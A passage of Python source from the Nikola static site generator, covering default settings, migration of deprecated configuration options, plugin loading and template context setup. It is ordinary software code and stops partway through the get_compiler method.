'HYPHENATE': False,
'IMAGE_FOLDERS': {'images': ''},
'INDEX_DISPLAY_POST_COUNT': 10,
'INDEX_FILE': 'index.html',
'INDEX_TEASERS': False,
'IMAGE_THUMBNAIL_SIZE': 400,
'INDEXES_TITLE': "",
'INDEXES_PAGES': "",
'INDEXES_PAGES_MAIN': False,
'INDEXES_PRETTY_PAGE_URL': False,
'INDEXES_STATIC': True,
'INDEX_PATH': '',
'IPYNB_CONFIG': {},
'LESS_COMPILER': 'lessc',
'LESS_OPTIONS': [],
'LICENSE': '',
'LINK_CHECK_WHITELIST': [],
'LISTINGS_FOLDERS': {'listings': 'listings'},
'LOGO_URL': '',
'NAVIGATION_LINKS': {},
'MARKDOWN_EXTENSIONS': ['fenced_code', 'codehilite'], # FIXME: Add 'extras' in v8
'MAX_IMAGE_SIZE': 1280,
'MATHJAX_CONFIG': '',
'OLD_THEME_SUPPORT': True,
'OUTPUT_FOLDER': 'output',
'POSTS': (("posts/*.txt", "posts", "post.tmpl"),),
'POSTS_SECTIONS': True,
'POSTS_SECTION_ARE_INDEXES': True,
'POSTS_SECTION_DESCRIPTIONS': "",
'POSTS_SECTION_FROM_META': False,
'POSTS_SECTION_NAME': "",
'POSTS_SECTION_TITLE': "{name}",
'PAGES': (("stories/*.txt", "stories", "story.tmpl"),),
'PANDOC_OPTIONS': [],
'PRETTY_URLS': False,
'FUTURE_IS_NOW': False,
'INDEX_READ_MORE_LINK': DEFAULT_INDEX_READ_MORE_LINK,
'REDIRECTIONS': [],
'ROBOTS_EXCLUSIONS': [],
'GENERATE_ATOM': False,
'FEED_ENCLOSURE': 'link',
'FEED_TEASERS': True,
'FEED_PLAIN': False,
'FEED_PREVIEWIMAGE': True,
'FEED_PREVIEWIMAGE_DEFAULT': None,
'FEED_PUSH': None,
'FEED_READ_MORE_LINK': DEFAULT_FEED_READ_MORE_LINK,
'FEED_LINKS_APPEND_QUERY': False,
'FEED_PATH': '',
'GENERATE_RSS': True,
'RSS_LINK': None,
'RSS_PATH': '',
'SASS_COMPILER': 'sass',
'SASS_OPTIONS': [],
'SEARCH_FORM': '',
'SHOW_BLOG_TITLE': True,
'SHOW_SOURCELINK': True,
'SHOW_UNTRANSLATED_POSTS': True,
'SLUG_AUTHOR_PATH': True,
'SLUG_TAG_PATH': True,
'SOCIAL_BUTTONS_CODE': '',
'SITE_URL': 'https://example.com/',
'STORY_INDEX': False,
'STRIP_INDEXES': False,
'SITEMAP_INCLUDE_FILELESS_DIRS': True,
'TAG_PATH': 'categories',
'TAG_PAGES_ARE_INDEXES': False,
'TAG_PAGES_DESCRIPTIONS': {},
'TAG_PAGES_TITLES': {},
'TAGLIST_MINIMUM_POSTS': 1,
'TEMPLATE_FILTERS': {},
'THEME': 'bootstrap3',
'THEME_COLOR': '#5670d4', # light "corporate blue"
'THEME_REVEAL_CONFIG_SUBTHEME': 'sky',
'THEME_REVEAL_CONFIG_TRANSITION': 'cube',
'THUMBNAIL_SIZE': 180,
'UNSLUGIFY_TITLES': False, # WARNING: conf.py.in overrides this with True for backwards compatibility
'URL_TYPE': 'rel_path',
'USE_BASE_TAG': True,
'USE_BUNDLES': True,
'USE_CDN': False,
'USE_CDN_WARNING': True,
'USE_FILENAME_AS_TITLE': True,
'USE_KATEX': False,
'USE_OPEN_GRAPH': True,
'USE_SLUGIFY': True,
'TIMEZONE': 'UTC',
'WRITE_TAG_CLOUD': True,
'DEPLOY_DRAFTS': True,
'DEPLOY_FUTURE': False,
'SCHEDULE_ALL': False,
'SCHEDULE_RULE': '',
'LOGGING_HANDLERS': {'stderr': {'loglevel': 'WARNING', 'bubble': True}},
'DEMOTE_HEADERS': 1,
'GITHUB_SOURCE_BRANCH': 'master',
'GITHUB_DEPLOY_BRANCH': 'gh-pages',
'GITHUB_REMOTE_NAME': 'origin',
}
# set global_context for template rendering
self._GLOBAL_CONTEXT = {}
self.config.update(config)
# __builtins__ contains useless cruft
if '__builtins__' in self.config:
try:
del self.config['__builtins__']
except KeyError:
del self.config[b'__builtins__']
self.config['__colorful__'] = self.colorful
self.config['__invariant__'] = self.invariant
self.config['__quiet__'] = self.quiet
# Make sure we have sane NAVIGATION_LINKS.
if not self.config['NAVIGATION_LINKS']:
self.config['NAVIGATION_LINKS'] = {self.config['DEFAULT_LANG']: ()}
# Translatability configuration.
self.config['TRANSLATIONS'] = self.config.get('TRANSLATIONS',
{self.config['DEFAULT_LANG']: ''})
utils.TranslatableSetting.default_lang = self.config['DEFAULT_LANG']
self.TRANSLATABLE_SETTINGS = ('BLOG_AUTHOR',
'BLOG_TITLE',
'BLOG_DESCRIPTION',
'LICENSE',
'CONTENT_FOOTER',
'SOCIAL_BUTTONS_CODE',
'SEARCH_FORM',
'BODY_END',
'EXTRA_HEAD_DATA',
'NAVIGATION_LINKS',
'INDEX_READ_MORE_LINK',
'FEED_READ_MORE_LINK',
'INDEXES_TITLE',
'POSTS_SECTION_COLORS',
'POSTS_SECTION_DESCRIPTIONS',
'POSTS_SECTION_NAME',
'POSTS_SECTION_TITLE',
'INDEXES_PAGES',
'INDEXES_PRETTY_PAGE_URL',
# PATH options (Issue #1914)
'TAG_PATH',
'CATEGORY_PATH',
'DATE_FORMAT',
'JS_DATE_FORMAT',
)
self._GLOBAL_CONTEXT_TRANSLATABLE = ('blog_author',
'blog_title',
'blog_desc', # TODO: remove in v8
'blog_description',
'license',
'content_footer',
'social_buttons_code',
'search_form',
'body_end',
'extra_head_data',
'date_format',
'js_date_format',)
# WARNING: navigation_links SHOULD NOT be added to the list above.
# Themes ask for [lang] there and we should provide it.
# We first have to massage JS_DATE_FORMAT, otherwise we run into trouble
if 'JS_DATE_FORMAT' in self.config:
if isinstance(self.config['JS_DATE_FORMAT'], dict):
for k in self.config['JS_DATE_FORMAT']:
self.config['JS_DATE_FORMAT'][k] = json.dumps(self.config['JS_DATE_FORMAT'][k])
else:
self.config['JS_DATE_FORMAT'] = json.dumps(self.config['JS_DATE_FORMAT'])
for i in self.TRANSLATABLE_SETTINGS:
try:
self.config[i] = utils.TranslatableSetting(i, self.config[i], self.config['TRANSLATIONS'])
except KeyError:
pass
# Handle CONTENT_FOOTER properly.
# We provide the arguments to format in CONTENT_FOOTER_FORMATS.
self.config['CONTENT_FOOTER'].langformat(self.config['CONTENT_FOOTER_FORMATS'])
# propagate USE_SLUGIFY
utils.USE_SLUGIFY = self.config['USE_SLUGIFY']
# Make sure we have pyphen installed if we are using it
if self.config.get('HYPHENATE') and pyphen is None:
utils.LOGGER.warn('To use the hyphenation, you have to install '
'the "pyphen" package.')
utils.LOGGER.warn('Setting HYPHENATE to False.')
self.config['HYPHENATE'] = False
# FIXME: Internally, we still use post_pages because it's a pain to change it
self.config['post_pages'] = []
for i1, i2, i3 in self.config['POSTS']:
self.config['post_pages'].append([i1, i2, i3, True])
for i1, i2, i3 in self.config['PAGES']:
self.config['post_pages'].append([i1, i2, i3, False])
# RSS_TEASERS has been replaced with FEED_TEASERS
# TODO: remove on v8
if 'RSS_TEASERS' in config:
utils.LOGGER.warn('The RSS_TEASERS option is deprecated, use FEED_TEASERS instead.')
if 'FEED_TEASERS' in config:
utils.LOGGER.warn('FEED_TEASERS conflicts with RSS_TEASERS, ignoring RSS_TEASERS.')
self.config['FEED_TEASERS'] = config['RSS_TEASERS']
# RSS_PLAIN has been replaced with FEED_PLAIN
# TODO: remove on v8
if 'RSS_PLAIN' in config:
utils.LOGGER.warn('The RSS_PLAIN option is deprecated, use FEED_PLAIN instead.')
if 'FEED_PLAIN' in config:
utils.LOGGER.warn('FEED_PLIN conflicts with RSS_PLAIN, ignoring RSS_PLAIN.')
self.config['FEED_PLAIN'] = config['RSS_PLAIN']
# RSS_LINKS_APPEND_QUERY has been replaced with FEED_LINKS_APPEND_QUERY
# TODO: remove on v8
if 'RSS_LINKS_APPEND_QUERY' in config:
utils.LOGGER.warn('The RSS_LINKS_APPEND_QUERY option is deprecated, use FEED_LINKS_APPEND_QUERY instead.')
if 'FEED_TEASERS' in config:
utils.LOGGER.warn('FEED_LINKS_APPEND_QUERY conflicts with RSS_LINKS_APPEND_QUERY, ignoring RSS_LINKS_APPEND_QUERY.')
self.config['FEED_LINKS_APPEND_QUERY'] = utils.TranslatableSetting('FEED_LINKS_APPEND_QUERY', config['RSS_LINKS_APPEND_QUERY'], self.config['TRANSLATIONS'])
# RSS_READ_MORE_LINK has been replaced with FEED_READ_MORE_LINK
# TODO: remove on v8
if 'RSS_READ_MORE_LINK' in config:
utils.LOGGER.warn('The RSS_READ_MORE_LINK option is deprecated, use FEED_READ_MORE_LINK instead.')
if 'FEED_READ_MORE_LINK' in config:
utils.LOGGER.warn('FEED_READ_MORE_LINK conflicts with RSS_READ_MORE_LINK, ignoring RSS_READ_MORE_LINK')
self.config['FEED_READ_MORE_LINK'] = utils.TranslatableSetting('FEED_READ_MORE_LINK', config['RSS_READ_MORE_LINK'], self.config['TRANSLATIONS'])
# RSS_PATH has been replaced with FEED_PATH
# TODO: remove on v8
if 'RSS_PATH' in config:
utils.LOGGER.warn('The RSS_PATH option is deprecated, use FEED_PATH instead.')
if 'FEED_PATH' in config:
utils.LOGGER.warn('FEED_PATH conflicts with RSS_PATH, ignoring RSS_PATH')
else:
self.config['FEED_PATH'] = config['RSS_PATH']
# DEFAULT_TRANSLATIONS_PATTERN was changed from "p.e.l" to "p.l.e"
# TODO: remove on v8
if 'TRANSLATIONS_PATTERN' not in self.config:
if len(self.config.get('TRANSLATIONS', {})) > 1:
utils.LOGGER.warn('You do not have a TRANSLATIONS_PATTERN set in your config, yet you have multiple languages.')
utils.LOGGER.warn('Setting TRANSLATIONS_PATTERN to the pre-v6 default ("{path}.{ext}.{lang}").')
utils.LOGGER.warn('Please add the proper pattern to your conf.py. (The new default in v7 is "{0}".)'.format(DEFAULT_TRANSLATIONS_PATTERN))
self.config['TRANSLATIONS_PATTERN'] = "{path}.{ext}.{lang}"
else:
# use v7 default there
self.config['TRANSLATIONS_PATTERN'] = DEFAULT_TRANSLATIONS_PATTERN
# HIDE_SOURCELINK has been replaced with the inverted SHOW_SOURCELINK
# TODO: remove on v8
if 'HIDE_SOURCELINK' in config:
utils.LOGGER.warn('The HIDE_SOURCELINK option is deprecated, use SHOW_SOURCELINK instead.')
if 'SHOW_SOURCELINK' in config:
utils.LOGGER.warn('HIDE_SOURCELINK conflicts with SHOW_SOURCELINK, ignoring HIDE_SOURCELINK.')
self.config['SHOW_SOURCELINK'] = not config['HIDE_SOURCELINK']
# HIDE_UNTRANSLATED_POSTS has been replaced with the inverted SHOW_UNTRANSLATED_POSTS
# TODO: remove on v8
if 'HIDE_UNTRANSLATED_POSTS' in config:
utils.LOGGER.warn('The HIDE_UNTRANSLATED_POSTS option is deprecated, use SHOW_UNTRANSLATED_POSTS instead.')
if 'SHOW_UNTRANSLATED_POSTS' in config:
utils.LOGGER.warn('HIDE_UNTRANSLATED_POSTS conflicts with SHOW_UNTRANSLATED_POSTS, ignoring HIDE_UNTRANSLATED_POSTS.')
self.config['SHOW_UNTRANSLATED_POSTS'] = not config['HIDE_UNTRANSLATED_POSTS']
# READ_MORE_LINK has been split into INDEX_READ_MORE_LINK and RSS_READ_MORE_LINK
# TODO: remove on v8
if 'READ_MORE_LINK' in config:
utils.LOGGER.warn('The READ_MORE_LINK option is deprecated, use INDEX_READ_MORE_LINK and RSS_READ_MORE_LINK instead.')
if 'INDEX_READ_MORE_LINK' in config:
utils.LOGGER.warn('READ_MORE_LINK conflicts with INDEX_READ_MORE_LINK, ignoring READ_MORE_LINK.')
else:
self.config['INDEX_READ_MORE_LINK'] = utils.TranslatableSetting('INDEX_READ_MORE_LINK', config['READ_MORE_LINK'], self.config['TRANSLATIONS'])
if 'RSS_READ_MORE_LINK' in config:
utils.LOGGER.warn('READ_MORE_LINK conflicts with RSS_READ_MORE_LINK, ignoring READ_MORE_LINK.')
else:
self.config['RSS_READ_MORE_LINK'] = utils.TranslatableSetting('RSS_READ_MORE_LINK', config['READ_MORE_LINK'], self.config['TRANSLATIONS'])
# Moot.it renamed themselves to muut.io
# TODO: remove on v8?
if self.config.get('COMMENT_SYSTEM') == 'moot':
utils.LOGGER.warn('The moot comment system has been renamed to muut by the upstream. Setting COMMENT_SYSTEM to "muut".')
self.config['COMMENT_SYSTEM'] = 'muut'
# Disable RSS. For a successful disable, we must have both the option
# false and the plugin disabled through the official means.
if 'generate_rss' in self.config['DISABLED_PLUGINS'] and self.config['GENERATE_RSS'] is True:
self.config['GENERATE_RSS'] = False
if not self.config['GENERATE_RSS'] and 'generate_rss' not in self.config['DISABLED_PLUGINS']:
self.config['DISABLED_PLUGINS'].append('generate_rss')
# PRETTY_URLS defaults to enabling STRIP_INDEXES unless explicitly disabled
if self.config.get('PRETTY_URLS') and 'STRIP_INDEXES' not in config:
self.config['STRIP_INDEXES'] = True
if 'LISTINGS_FOLDER' in config:
if 'LISTINGS_FOLDERS' not in config:
utils.LOGGER.warn("The LISTINGS_FOLDER option is deprecated, use LISTINGS_FOLDERS instead.")
self.config['LISTINGS_FOLDERS'] = {self.config['LISTINGS_FOLDER']: self.config['LISTINGS_FOLDER']}
utils.LOGGER.warn("LISTINGS_FOLDERS = {0}".format(self.config['LISTINGS_FOLDERS']))
else:
utils.LOGGER.warn("Both LISTINGS_FOLDER and LISTINGS_FOLDERS are specified, ignoring LISTINGS_FOLDER.")
if 'GALLERY_PATH' in config:
if 'GALLERY_FOLDERS' not in config:
utils.LOGGER.warn("The GALLERY_PATH option is deprecated, use GALLERY_FOLDERS instead.")
self.config['GALLERY_FOLDERS'] = {self.config['GALLERY_PATH']: self.config['GALLERY_PATH']}
utils.LOGGER.warn("GALLERY_FOLDERS = {0}".format(self.config['GALLERY_FOLDERS']))
else:
utils.LOGGER.warn("Both GALLERY_PATH and GALLERY_FOLDERS are specified, ignoring GALLERY_PATH.")
if not self.config.get('COPY_SOURCES'):
self.config['SHOW_SOURCELINK'] = False
if self.config['CATEGORY_PATH']._inp is None:
self.config['CATEGORY_PATH'] = self.config['TAG_PATH']
if self.config['CATEGORY_PAGES_ARE_INDEXES'] is None:
self.config['CATEGORY_PAGES_ARE_INDEXES'] = self.config['TAG_PAGES_ARE_INDEXES']
self.default_lang = self.config['DEFAULT_LANG']
self.translations = self.config['TRANSLATIONS']
locale_fallback, locale_default, locales = sanitized_locales(
self.config.get('LOCALE_FALLBACK', None),
self.config.get('LOCALE_DEFAULT', None),
self.config.get('LOCALES', {}), self.translations)
utils.LocaleBorg.initialize(locales, self.default_lang)
# BASE_URL defaults to SITE_URL
if 'BASE_URL' not in self.config:
self.config['BASE_URL'] = self.config.get('SITE_URL')
# BASE_URL should *always* end in /
if self.config['BASE_URL'] and self.config['BASE_URL'][-1] != '/':
utils.LOGGER.warn("Your BASE_URL doesn't end in / -- adding it, but please fix it in your config file!")
self.config['BASE_URL'] += '/'
try:
_bnl = urlsplit(self.config['BASE_URL']).netloc
_bnl.encode('ascii')
urlsplit(self.config['SITE_URL']).netloc.encode('ascii')
except (UnicodeEncodeError, UnicodeDecodeError):
utils.LOGGER.error("Your BASE_URL or SITE_URL contains an IDN expressed in Unicode. Please convert it to Punycode.")
utils.LOGGER.error("Punycode of {}: {}".format(_bnl, _bnl.encode('idna')))
sys.exit(1)
# TODO: remove in v8
if not isinstance(self.config['DEPLOY_COMMANDS'], dict):
utils.LOGGER.warn("A single list as DEPLOY_COMMANDS is deprecated. DEPLOY_COMMANDS should be a dict, with deploy preset names as keys and lists of commands as values.")
utils.LOGGER.warn("The key `default` is used by `nikola deploy`:")
self.config['DEPLOY_COMMANDS'] = {'default': self.config['DEPLOY_COMMANDS']}
utils.LOGGER.warn("DEPLOY_COMMANDS = {0}".format(self.config['DEPLOY_COMMANDS']))
utils.LOGGER.info("(The above can be used with `nikola deploy` or `nikola deploy default`. Multiple presets are accepted.)")
# TODO: remove and change default in v8
if 'BLOG_TITLE' in config and 'WRITE_TAG_CLOUD' not in config:
# BLOG_TITLE is a hack, otherwise the warning would be displayed
# when conf.py does not exist
utils.LOGGER.warn("WRITE_TAG_CLOUD is not set in your config. Defaulting to True (== writing tag_cloud_data.json).")
utils.LOGGER.warn("Please explicitly add the setting to your conf.py with the desired value, as the setting will default to False in the future.")
# We use one global tzinfo object all over Nikola.
try:
self.tzinfo = dateutil.tz.gettz(self.config['TIMEZONE'])
except Exception as exc:
utils.LOGGER.warn("Error getting TZ: {}", exc)
self.tzinfo = dateutil.tz.gettz()
self.config['__tzinfo__'] = self.tzinfo
# Store raw compilers for internal use (need a copy for that)
self.config['_COMPILERS_RAW'] = {}
for k, v in self.config['COMPILERS'].items():
self.config['_COMPILERS_RAW'][k] = list(v)
compilers = defaultdict(set)
# Also add aliases for combinations with TRANSLATIONS_PATTERN
for compiler, exts in self.config['COMPILERS'].items():
for ext in exts:
compilers[compiler].add(ext)
for lang in self.config['TRANSLATIONS'].keys():
candidate = utils.get_translation_candidate(self.config, "f" + ext, lang)
compilers[compiler].add(candidate)
# Avoid redundant compilers
# Remove compilers that match nothing in POSTS/PAGES
# And put them in "bad compilers"
pp_exts = set([os.path.splitext(x[0])[1] for x in self.config['post_pages']])
self.config['COMPILERS'] = {}
self.disabled_compilers = {}
self.bad_compilers = set([])
for k, v in compilers.items():
if pp_exts.intersection(v):
self.config['COMPILERS'][k] = sorted(list(v))
else:
self.bad_compilers.add(k)
self.feedutil = FeedUtil(self)
self._set_global_context()
def init_plugins(self, commands_only=False):
"""Load plugins as needed."""
self.plugin_manager = PluginManager(categories_filter={
"Command": Command,
"Task": Task,
"LateTask": LateTask,
"TemplateSystem": TemplateSystem,
"PageCompiler": PageCompiler,
"TaskMultiplier": TaskMultiplier,
"CompilerExtension": CompilerExtension,
"MarkdownExtension": MarkdownExtension,
"RestExtension": RestExtension,
"SignalHandler": SignalHandler,
"ConfigPlugin": ConfigPlugin,
"PostScanner": PostScanner,
})
self.plugin_manager.getPluginLocator().setPluginInfoExtension('plugin')
extra_plugins_dirs = self.config['EXTRA_PLUGINS_DIRS']
if sys.version_info[0] == 3:
places = [
resource_filename('nikola', 'plugins'),
os.path.join(os.getcwd(), 'plugins'),
os.path.expanduser('~/.nikola/plugins'),
] + [path for path in extra_plugins_dirs if path]
else:
places = [
resource_filename('nikola', utils.sys_encode('plugins')),
os.path.join(os.getcwd(), utils.sys_encode('plugins')),
os.path.expanduser('~/.nikola/plugins'),
] + [utils.sys_encode(path) for path in extra_plugins_dirs if path]
self.plugin_manager.getPluginLocator().setPluginPlaces(places)
self.plugin_manager.locatePlugins()
bad_candidates = set([])
for p in self.plugin_manager._candidates:
if commands_only:
if p[-1].details.has_option('Nikola', 'plugincategory'):
# FIXME TemplateSystem should not be needed
if p[-1].details.get('Nikola', 'PluginCategory') not in {'Command', 'Template'}:
bad_candidates.add(p)
else: # Not commands-only
# Remove compilers we don't use
if p[-1].name in self.bad_compilers:
bad_candidates.add(p)
self.disabled_compilers[p[-1].name] = p
utils.LOGGER.debug('Not loading unneeded compiler {}', p[-1].name)
if p[-1].name not in self.config['COMPILERS'] and \
p[-1].details.has_option('Nikola', 'plugincategory') and p[-1].details.get('Nikola', 'PluginCategory') == 'Compiler':
bad_candidates.add(p)
self.disabled_compilers[p[-1].name] = p
utils.LOGGER.debug('Not loading unneeded compiler {}', p[-1].name)
# Remove blacklisted plugins
if p[-1].name in self.config['DISABLED_PLUGINS']:
bad_candidates.add(p)
utils.LOGGER.debug('Not loading disabled plugin {}', p[-1].name)
# Remove compiler extensions we don't need
if p[-1].details.has_option('Nikola', 'compiler') and p[-1].details.get('Nikola', 'compiler') in self.disabled_compilers:
bad_candidates.add(p)
utils.LOGGER.debug('Not loading compiler extension {}', p[-1].name)
self.plugin_manager._candidates = list(set(self.plugin_manager._candidates) - bad_candidates)
self.plugin_manager.loadPlugins()
self._activate_plugins_of_category("SignalHandler")
# Emit signal for SignalHandlers which need to start running immediately.
signal('sighandlers_loaded').send(self)
self._commands = {}
command_plugins = self._activate_plugins_of_category("Command")
for plugin_info in command_plugins:
plugin_info.plugin_object.short_help = plugin_info.description
self._commands[plugin_info.name] = plugin_info.plugin_object
self._activate_plugins_of_category("PostScanner")
self._activate_plugins_of_category("Task")
self._activate_plugins_of_category("LateTask")
self._activate_plugins_of_category("TaskMultiplier")
# Activate all required compiler plugins
self.compiler_extensions = self._activate_plugins_of_category("CompilerExtension")
for plugin_info in self.plugin_manager.getPluginsOfCategory("PageCompiler"):
if plugin_info.name in self.config["COMPILERS"].keys():
self.plugin_manager.activatePluginByName(plugin_info.name)
plugin_info.plugin_object.set_site(self)
# Load compiler plugins
self.compilers = {}
self.inverse_compilers = {}
for plugin_info in self.plugin_manager.getPluginsOfCategory(
"PageCompiler"):
self.compilers[plugin_info.name] = \
plugin_info.plugin_object
self._activate_plugins_of_category("ConfigPlugin")
signal('configured').send(self)
def _set_global_context(self):
"""Create global context from configuration."""
self._GLOBAL_CONTEXT['url_type'] = self.config['URL_TYPE']
self._GLOBAL_CONTEXT['timezone'] = self.tzinfo
self._GLOBAL_CONTEXT['_link'] = self.link
try:
self._GLOBAL_CONTEXT['set_locale'] = utils.LocaleBorg().set_locale
except utils.LocaleBorgUninitializedException:
self._GLOBAL_CONTEXT['set_locale'] = None
self._GLOBAL_CONTEXT['rel_link'] = self.rel_link
self._GLOBAL_CONTEXT['abs_link'] = self.abs_link
self._GLOBAL_CONTEXT['exists'] = self.file_exists
self._GLOBAL_CONTEXT['SLUG_AUTHOR_PATH'] = self.config['SLUG_AUTHOR_PATH']
self._GLOBAL_CONTEXT['SLUG_TAG_PATH'] = self.config['SLUG_TAG_PATH']
self._GLOBAL_CONTEXT['annotations'] = self.config['ANNOTATIONS']
self._GLOBAL_CONTEXT['index_display_post_count'] = self.config[
'INDEX_DISPLAY_POST_COUNT']
self._GLOBAL_CONTEXT['index_file'] = self.config['INDEX_FILE']
self._GLOBAL_CONTEXT['use_base_tag'] = self.config['USE_BASE_TAG']
self._GLOBAL_CONTEXT['use_bundles'] = self.config['USE_BUNDLES']
self._GLOBAL_CONTEXT['use_cdn'] = self.config.get("USE_CDN")
self._GLOBAL_CONTEXT['theme_color'] = self.config.get("THEME_COLOR")
self._GLOBAL_CONTEXT['favicons'] = self.config['FAVICONS']
self._GLOBAL_CONTEXT['date_format'] = self.config.get('DATE_FORMAT')
self._GLOBAL_CONTEXT['blog_author'] = self.config.get('BLOG_AUTHOR')
self._GLOBAL_CONTEXT['blog_title'] = self.config.get('BLOG_TITLE')
self._GLOBAL_CONTEXT['show_blog_title'] = self.config.get('SHOW_BLOG_TITLE')
self._GLOBAL_CONTEXT['logo_url'] = self.config.get('LOGO_URL')
self._GLOBAL_CONTEXT['blog_description'] = self.config.get('BLOG_DESCRIPTION')
self._GLOBAL_CONTEXT['color_hsl_adjust_hex'] = utils.color_hsl_adjust_hex
self._GLOBAL_CONTEXT['colorize_str_from_base_color'] = utils.colorize_str_from_base_color
# TODO: remove in v8
self._GLOBAL_CONTEXT['blog_desc'] = self.config.get('BLOG_DESCRIPTION')
self._GLOBAL_CONTEXT['blog_url'] = self.config.get('SITE_URL')
self._GLOBAL_CONTEXT['template_hooks'] = self.template_hooks
self._GLOBAL_CONTEXT['body_end'] = self.config.get('BODY_END')
self._GLOBAL_CONTEXT['social_buttons_code'] = self.config.get('SOCIAL_BUTTONS_CODE')
self._GLOBAL_CONTEXT['translations'] = self.config.get('TRANSLATIONS')
self._GLOBAL_CONTEXT['license'] = self.config.get('LICENSE')
self._GLOBAL_CONTEXT['search_form'] = self.config.get('SEARCH_FORM')
self._GLOBAL_CONTEXT['comment_system'] = self.config.get('COMMENT_SYSTEM')
self._GLOBAL_CONTEXT['comment_system_id'] = self.config.get('COMMENT_SYSTEM_ID')
self._GLOBAL_CONTEXT['site_has_comments'] = bool(self.config.get('COMMENT_SYSTEM'))
self._GLOBAL_CONTEXT['mathjax_config'] = self.config.get(
'MATHJAX_CONFIG')
self._GLOBAL_CONTEXT['use_katex'] = self.config.get('USE_KATEX')
self._GLOBAL_CONTEXT['subtheme'] = self.config.get('THEME_REVEAL_CONFIG_SUBTHEME')
self._GLOBAL_CONTEXT['transition'] = self.config.get('THEME_REVEAL_CONFIG_TRANSITION')
self._GLOBAL_CONTEXT['content_footer'] = self.config.get(
'CONTENT_FOOTER')
self._GLOBAL_CONTEXT['generate_atom'] = self.config.get('GENERATE_ATOM')
self._GLOBAL_CONTEXT['generate_rss'] = self.config.get('GENERATE_RSS')
self._GLOBAL_CONTEXT['rss_path'] = self.config.get('FEED_PATH')
self._GLOBAL_CONTEXT['rss_link'] = self.config.get('RSS_LINK')
self._GLOBAL_CONTEXT['navigation_links'] = self.config.get('NAVIGATION_LINKS')
self._GLOBAL_CONTEXT['use_open_graph'] = self.config.get(
'USE_OPEN_GRAPH', True)
self._GLOBAL_CONTEXT['twitter_card'] = self.config.get(
'TWITTER_CARD', {})
self._GLOBAL_CONTEXT['hide_sourcelink'] = not self.config.get(
'SHOW_SOURCELINK')
self._GLOBAL_CONTEXT['show_sourcelink'] = self.config.get(
'SHOW_SOURCELINK')
self._GLOBAL_CONTEXT['extra_head_data'] = self.config.get('EXTRA_HEAD_DATA')
self._GLOBAL_CONTEXT['date_fanciness'] = self.config.get('DATE_FANCINESS')
self._GLOBAL_CONTEXT['js_date_format'] = self.config.get('JS_DATE_FORMAT')
self._GLOBAL_CONTEXT['colorbox_locales'] = LEGAL_VALUES['COLORBOX_LOCALES']
self._GLOBAL_CONTEXT['momentjs_locales'] = LEGAL_VALUES['MOMENTJS_LOCALES']
self._GLOBAL_CONTEXT['hidden_tags'] = self.config.get('HIDDEN_TAGS')
self._GLOBAL_CONTEXT['hidden_categories'] = self.config.get('HIDDEN_CATEGORIES')
self._GLOBAL_CONTEXT['hidden_authors'] = self.config.get('HIDDEN_AUTHORS')
self._GLOBAL_CONTEXT['url_replacer'] = self.url_replacer
self._GLOBAL_CONTEXT['posts_sections'] = self.config.get('POSTS_SECTIONS')
self._GLOBAL_CONTEXT['posts_section_are_indexes'] = self.config.get('POSTS_SECTION_ARE_INDEXES')
self._GLOBAL_CONTEXT['posts_section_colors'] = self.config.get('POSTS_SECTION_COLORS')
self._GLOBAL_CONTEXT['posts_section_descriptions'] = self.config.get('POSTS_SECTION_DESCRIPTIONS')
self._GLOBAL_CONTEXT['posts_section_from_meta'] = self.config.get('POSTS_SECTION_FROM_META')
self._GLOBAL_CONTEXT['posts_section_name'] = self.config.get('POSTS_SECTION_NAME')
self._GLOBAL_CONTEXT['posts_section_title'] = self.config.get('POSTS_SECTION_TITLE')
# IPython theme configuration. If a website has ipynb enabled in post_pages
# we should enable the IPython CSS (leaving that up to the theme itself).
self._GLOBAL_CONTEXT['needs_ipython_css'] = 'ipynb' in self.config['COMPILERS']
self._GLOBAL_CONTEXT.update(self.config.get('GLOBAL_CONTEXT', {}))
def _activate_plugins_of_category(self, category):
"""Activate all the plugins of a given category and return them."""
# this code duplicated in tests/base.py
plugins = []
for plugin_info in self.plugin_manager.getPluginsOfCategory(category):
self.plugin_manager.activatePluginByName(plugin_info.name)
plugin_info.plugin_object.set_site(self)
plugins.append(plugin_info)
return plugins
def _get_themes(self):
if self._THEMES is None:
try:
self._THEMES = utils.get_theme_chain(self.config['THEME'])
except Exception:
utils.LOGGER.warn('''Cannot load theme "{0}", using 'bootstrap3' instead.'''.format(self.config['THEME']))
self.config['THEME'] = 'bootstrap3'
return self._get_themes()
# Check consistency of USE_CDN and the current THEME (Issue #386)
if self.config['USE_CDN'] and self.config['USE_CDN_WARNING']:
bootstrap_path = utils.get_asset_path(os.path.join(
'assets', 'css', 'bootstrap.min.css'), self._THEMES)
if bootstrap_path and bootstrap_path.split(os.sep)[-4] not in ['bootstrap', 'bootstrap3']:
utils.LOGGER.warn('The USE_CDN option may be incompatible with your theme, because it uses a hosted version of bootstrap.')
return self._THEMES
THEMES = property(_get_themes)
def _get_messages(self):
try:
return utils.load_messages(self.THEMES,
self.translations,
self.default_lang)
except utils.LanguageNotFoundError as e:
utils.LOGGER.error('''Cannot load language "{0}". Please make sure it is supported by Nikola itself, or that you have the appropriate messages files in your themes.'''.format(e.lang))
sys.exit(1)
MESSAGES = property(_get_messages)
def _get_global_context(self):
"""Initialize some parts of GLOBAL_CONTEXT only when it's queried."""
if 'messages' not in self._GLOBAL_CONTEXT:
self._GLOBAL_CONTEXT['messages'] = self.MESSAGES
if 'has_custom_css' not in self._GLOBAL_CONTEXT:
# check if custom css exist and is not empty
custom_css_path = utils.get_asset_path(
'assets/css/custom.css',
self.THEMES,
self.config['FILES_FOLDERS']
)
if custom_css_path and self.file_exists(custom_css_path, not_empty=True):
self._GLOBAL_CONTEXT['has_custom_css'] = True
else:
self._GLOBAL_CONTEXT['has_custom_css'] = False
return self._GLOBAL_CONTEXT
GLOBAL_CONTEXT = property(_get_global_context)
def _get_template_system(self):
if self._template_system is None:
# Load template plugin
template_sys_name = utils.get_template_engine(self.THEMES)
pi = self.plugin_manager.getPluginByName(
template_sys_name, "TemplateSystem")
if pi is None:
sys.stderr.write("Error loading {0} template system "
"plugin\n".format(template_sys_name))
sys.exit(1)
self._template_system = pi.plugin_object
lookup_dirs = ['templates'] + [os.path.join(utils.get_theme_path(name), "templates")
for name in self.THEMES]
self._template_system.set_directories(lookup_dirs,
self.config['CACHE_FOLDER'])
self._template_system.set_site(self)
return self._template_system
template_system = property(_get_template_system)
def get_compiler(self, source_name):
"""Get the correct compiler for a post from `conf.COMPILERS`.
To make things easier for users, the mapping in conf.py is
compiler->[extensions], although this is less convenient for us.
The majority of this function is reversing that dictionary and error checking.
"""
ext = os.path.splitext(source_name)[1]
try:
compile_html = self.inverse_compilers[ext]
